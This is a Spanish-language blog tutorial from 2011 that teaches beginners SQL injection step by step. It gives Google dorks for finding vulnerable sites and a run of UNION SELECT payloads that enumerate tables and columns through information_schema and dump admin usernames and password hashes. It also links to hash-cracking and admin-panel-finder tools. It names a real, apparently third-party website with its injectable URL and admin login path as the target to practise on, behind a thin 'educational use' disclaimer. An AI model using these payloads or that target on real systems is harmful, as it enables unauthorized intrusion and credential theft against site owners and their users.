Tutorial de Inyeccin SQL para principiantes

Publicado por OverNet en sbado, julio 23, 2011 ,

Primero y antes que nada, debemos saber muy bien los conceptos de cada uno que tocaremos en
este tema.

SQL Injection - Tutorial by OverNET
Qu es SQL?
Significa un Lenguaje de Consulta Estructurado (en ingles Structured Query Languaje). Como su
nombre lo indica es un lenguaje para tener acceso a una Base de Datos que nos permite realizar varias
operaciones en ella, como poder guardar informacin privada de un sitio web, contraseas, nombres, y
otras cosas.

Sin embargo, muchos CMS Sistema de Gestin de Contenidos (en ingles Content Management
System) utilizan SQL para acceder a una Base de Datos (PhpMyAdmin) y guardar informacin.

CMS (Sistema de Gestin de Contenidos) no es ningn tipo de programa literalmente, sin embargo,
es programado para que los usuarios tengan la facilidad de crear su pagina web utilizando una base de
datos.
Algunos CMS son muy populares como lo son; SMF, Wordpress, y Blogger entre otros.

Y qu significa SQLi?
Son la abreviatura de SQL Injection. Aunque, SQLi es un bug bastante viejo, existen CMS o pginas
web con esta vulnerabilidad.

Debido que es un post para principiantes y un poco largo, no ir muy a fondo sobre los conceptos, por
eso mejor aqu la dejamos y vamos al tutorial.

Donde puedo encontrar paginas vulnerables a SQLi?
En Google, sin embargo, existen Dorks (Palabras claves para poder encontrar CMS vulnerables con
facilidad). De cualquier manera no es muy difcil encontrar sitios (Probablemente) vulnerables a SQLi.


Logotipo de Google
Solo es cuestin de ingeniarse las palabras claves para encontrar sitios Web con este bug.
No entendiste? La Inyeccin SQL se empieza por encontrar en una url muy parecido a
esto: /index.php?id=28, sin embargo, la inyeccin se comienza en la variable id=28.

Tutorial Inyeccin SQL para principiantes
Primera fase
Un ejemplo de como buscar en Google
1) Nos dirigimos a la pagina de Google y en el buscador colocamos esto id = cat index.php?
Nota: Actualmente Google ha actualizado su buscador, ha mejorado sus herramientas, y la
interfaz grafica.
Sin embargo, obtendremos tal resultado como la imagen:

Google 2011-Junio: Buscador

2) Tambin podemos utilizar la barra lateral Izquierda para encontrar ms sitios vulnerables.

Barra lateral de Google Search 2011
Como saber si la pgina es vulnerable?
Bastante sencillo, tan solo colocar una ' (Comillas, coma, punto, cualquier caracter) al final de la
variable es decir /index.php?id=28' nos deber marcar un error ms o menos as (Puede variar los
errores, pero el ms comn entre ellos es este):
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near ''' at line 1
S de lo contrario no muestra error, quizs el sitio no sea vulnerable.. (Pero no
significa que no sea vulnerable a SQLi).
Como? Osea es vulnerable o no?
Djame explicarlo, muchos administradores no tienen idea lo fcil que es arreglar este bug
(SQLi) en su pagina web, lo que ellos hacen es unicamente agregar una funcin en PHP
para evitar que se muestren los errores de la web es un error muy grave que cometen
los webmaster, ni ms ni menos, este es el sencillo cdigo PHP que utilizan:
<?php error_reporting(0); ?>Cabe mencionar que es un error muy comn por parte de los
administradores, ya que eso no arregla el bug, sin embargo, el bug sigue all.. Es un
problema para la seguridad de su sitio, ya que el atacante podr darse cuenta y seguir
intentando hasta tener el usuario y contrasea de la administracin fcilmente.

Explicacin resumida:
Tenemos la siguiente pgina como ejemplo http://www.asfasd.com/index.php?cat=45
Agregamos una comilla al final de la url http://www.asfasd.com/index.php?cat=45'
Nos muestra el siguiente error You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near ''' at line
1

Explotando el Bug
Segunda fase
Viene la parte un poco ms tediosa.
Pero antes de llegar a esta parte necesitamos entender dos conceptos:
UNION se usa para combinar el resultado de un nmero de comandos
SELECT en un conjunto de resultados.
Fuente | http://dev.mysql.com/doc/refman/5.0/es/union.html

Ahora ya habamos visto que nos lanzo un error anteriormente y que si era vulnerable, ahora es tiempo
de buscar hasta encontrar la columna vulnerable.
Un ejemplo sencillo de como empezar la inyeccin tenemos lo siguiente /index.php?cat=45 ahora
antes de la variable (45) y despus del signo (=) agregaremos el signo de menos (-) deber quedar as:
/articulo.php?articulo=-230 y agregamos el union y select y empezamos a
partir del numero 1 o el numero 0.
/articulo.php?articulo=-230+union+select+1-- (Muy importante poner los
dos ltimos guiones).
/articulo.php?articulo=-230+union+select+1,2,3-- (Es importante poner la
coma entre cada numero)
Seguiremos as, hasta que no nos vuelva salir error como el anterior

Como sabre si el numero de la columna es vulnerable?
Al momento que veas uno o ms nmeros en la web y que no haya un error quiere decir que le hemos
dado a la columna vulnerable, un ejemplo real:

Columnas vulnerables
Lo que esta marcado en recuadro esos nmeros no son errores, y en la barra de direcciones esta la
semi-inyeccin.
En resumen los nmeros marca que podemos concluir la inyeccin en este caso me ir sobre el numero
2 (color azul).
Hay que tener en cuenta tambin, la versin de la base de datos si es 5.*.* - comunity se podrn sacar
los nombres de las tablas y columnas, si de lo contrario es inferior a la versin 5, es decir versin 4 no
se podr extraer los nombres de las tablas y/o columnas, se tiene que hacer a ciegas y es un poco
tedioso.
Para saber la versin de la base de datos (SQL) solo agregamos al final de union+select+1,2,3,4,5
database()

Tercera fase
Sacando nombre de las Tablas
Desde la barra de direcciones remplazamos el numero 2 por group_concat(table_name) debe quedar
algo as:
/articulo.php?articulo=-
230+union+select+1,group_concat(table_name),3,4,5+from+information_s
chema.tables--
Tambin es importante agregar el +from+information_schema.tables-- al final, despus ingresamos
esa url y nos da como resultado todos los nombres de las tablas que existen en la Base de dados.
Ejemplo real:

Nombre de las Tablas (Incompleta)
Nota | Como se ve en la imagen, tenemos como resultado los nombres de las tablas. Pero hay un
pequeo problema, el tamao de la pgina nos limita a que solo veamos una cierta cantidad de numero
de tablas (Por naturaleza).
Sin embargo, no hay nada que nos impida, pues gracias a una funcin de SQL podemos utilizar
otra alternativa, en este caso ser la opcin limit que nos permitir limitar el rango de registro, y as
poder acceder a la tabla del administrador o la de usuarios.

En este caso hay que hacer lo siguiente, quitamos group_concat() y solo dejamos table_name y al
final de information_schema.tables agregamos +limit+1,1-- as quedar la url:
/articulo.php?articulo=-
230+union+select+1,table_name,3,4,5+from+information_schema.tables+li
mit+1,1--
Lo cul nos mostrar el nombre de la primer tabla, es decir, tendremos que buscar la tabla en donde se
encuentra la del admin o la de usuarios
Nota | Puedes seguir utilizando la misma serie de 10 en 10 para que sea ms rpido de encontrar la
tabla de usuarios, ya que esta en orden alfabtico de la a - z.

Un ejemplo sencillo:
/articulo.php?articulo=-
230+union+select+1,table_name,3,4,5+from+information_schema.tables+limit
+10,1--
La tabla es KEY_COLUMN_USAGE (No es la que buscamos)
Seguimos aumentando de 10 en 10:
/articulo.php?articulo=-
230+union+select+1,table_name,3,4,5+from+information_schema.tables+limit
+20,1--
La tabla es SESSION_VARIABLES (No es la que buscamos)
Seguimos intentado..
/articulo.php?articulo=-
230+union+select+1,table_name,3,4,5+from+information_schema.tables+limit
+30,1--,1--
La tabla es cotizaciones (No es la que buscamos, pero estamos un poco cerca..)
Y as, hasta dar con el nombre de la tabla uno que diga: admin, administrador, usuarios, users,
usuaris, etc.. (Puede variar los nombres de las tablas y columnas por el idioma)
/articulo.php?articulo=-
230+union+select+1,table_name,3,4,5+from+information_schema.tables+limit
+38,1--
La tabla es admin ( Bingo, es la que buscamos !!)
Una ves que tengamos el nombre de la tabla que queremos y es en este caso admin vamos a convertirla
en ASCII les dejo la herramienta online para el conversor de String a ASCII
| http://easycalculation.com/ascii-hex.php
admin = 97 100 109 105 110
Como ven, la cadena admin esta en ASCII.

Extraccin de columnas de la tabla
Cuarta fase

Ahora modificamos nuestra url algo que quede as (incluyendo admin, pero convertida en ASCII):
Nota | Lo marcado en negritas es lo que modifico la url anterior.
/articulo.php?articulo=-
230+union+select+1,group_concat(column_name),3,4,5+from+information_
schema.columns+where+table_name=char(97,100,109,105,110)--
Como resultado nos tendr que imprimir los nombres de las columnas, por ejemplo:
email, contrasena, usuario, pwd
Un ejemplo real es este:


Extraccin de columnas


Otra alternativa pero utilizando la misma opcin es utilizando el limit lo cul solo nos imprimir el
rango de la columna que le indiquemos.
Ejemplo:
/articulo.php?articulo=-
230+union+select+1,column_name,3,4,5+from+information_schema.columns
+where+table_name=char(97,100,109,105,110)+limit+0,1--

Extraccin de usuario y contrasea
Quinta fase
Esta parte es la ms fcil, ya que lo anterior era lo complicado. Supongamos que ya sabemos los
nombres de la tabla en este caso es admin y las columnas que nos interesan
son usuario y pwd (contrasea), ahora hay que extraer los datos de esas dos columnas y para eso
hacemos lo siguiente.:
Nota | Recuerda que lo remarcado en negritas es lo que cambia la url anterior.
/articulo.php?articulo=-
230+union+select+1,group_concat(usuario,0x3a,pwd),3,4,5+from+admin--
Con esa simple inyeccin nos mostrar el usuario y contrasea de la administracin.

SQL Injection

: = 0x3a (Hexadecimal)
usuario = Columna
pwd = Columna
admin = Tabla
La contrasea esta encriptada en MD5 Hash
Es lo peor que viene en este caso al no poder ver la contrasea real cuando esta encriptada en MD5
Hash.
Pero gracias a que existen herramientas y diccionarios para crackear MD5 las contraseas se pueden
desencriptar.
Pero hay que tener muy en cuenta que no todos los Hash son MD5 puede variar el tipo de Hash por la
seguridad del CMS, hay contraseas encriptadas en SHA-1, MD4, Base64, etc.. Son muy diferentes al
MD5.
Pero les dejo una lista para que puedan diferenciar el tipo de Hash
| http://www.insidepro.com/hashes.php tambin una herramienta en PHP para crackear Hash MD5
Online, tienen que subirlo a un FTP.
Herramienta crack MD5 Hash online mult.

No encuentro el login o la administracin de la pgina?
Por suerte tambin existen herramientas para poder encontrar el path en la que se encuentre el login de
la administracin, ac les dejo uno codeado por neutralised | Admin Panel Finder PHP.

Pagina para practicar
Como se pudieron dar cuenta, este tutorial me gui en una pagina vulnerable y esa pagina es esta:
http://www.ancvm.com/articulo.php?articulo=-230
Administracin de la pagina, la administracin de la web esta en este path
http://www.ancvm.com/admin/login.php
NOTA | Recuerden que esta pagina puede que por el tiempo no sea vulnerable a este tipo de
I nyeccin, tambin no abusen de los datos del administrador ni anden jodiendo la web, este tutorial
es de uso educativo y el administrador de este blog no se hace responsable de lo que el usuario
pudiera hacer con esta informacin.

Fin del Tutorial
Este tutorial fue creado por OverNET, si tienen dudas o sugerencias pueden escribirlas en este
mismo post.